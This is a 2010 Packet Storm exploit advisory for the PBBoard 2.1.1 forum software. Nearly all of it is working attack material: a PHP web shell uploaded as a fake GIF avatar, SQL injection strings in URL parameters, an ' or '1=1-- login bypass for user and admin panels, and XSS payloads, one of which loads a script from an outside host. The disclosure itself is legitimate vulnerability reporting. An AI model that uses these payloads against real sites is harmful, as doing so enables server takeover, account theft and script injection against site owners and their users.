PBBoard 2.1.1 SQL Injection / Cross Site Scripting / Shell Upload

2010-09-28T00:00:00
ID PACKETSTORM:94282
Type packetstorm
Reporter jiko
Modified 2010-09-28T00:00:00

Description

                                        
                                            `==================================================  
PBBoard 2.1.1 Multiple Remote Vulnerabilities  
==================================================  
  
|=-----------------------------------------------------=|  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
|=-----------------------------------------------------=|  
[~]-----------|00|  
NAme :JIKO (JAWAD)  
Home :No-exploit.Com  
Mail : !x!  
[~]-----------|01|  
-{Script}  
name :PBBoard_v2.1.1  
link :http://www.pbboard.com/PBBoard_v2.1.1.zip  
  
[~]-----------|02|  
-{3xpl01t}  
  
upload Shell and file .exe ....etc :(  
http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1  
select From my Pc  
and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img  
  
sql & xss  
all script is infected :(  
inser '( in all % variable in the script  
SQl :/index.php?page=forum&show=1&id=2'a  
Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>  
  
SQl :/index.php?page=profile&show=1&username=jawad'  
SQl :/index.php?page=profile&show=1&username=jawad' and id='1  
Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>  
........etc  
  
Xss In Profil  
  
Url :/index.php?page=usercp&control=1&avatar=1&main=1  
Select img From Url  
http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif  
  
Login :(  
  
User : real name of admin or member you want | jawad' or '1=1--  
Pass : jiko  
  
for admin panel  
  
Url : /admin.php  
User : jawad' or '1=1--  
Pass : jiko  
:((..Etc exploit  
  
  
[~]-----------|03|  
-{Greetz}  
All my friends  
|No-Exploit.com Members  
-------------------------------------  
  
  
`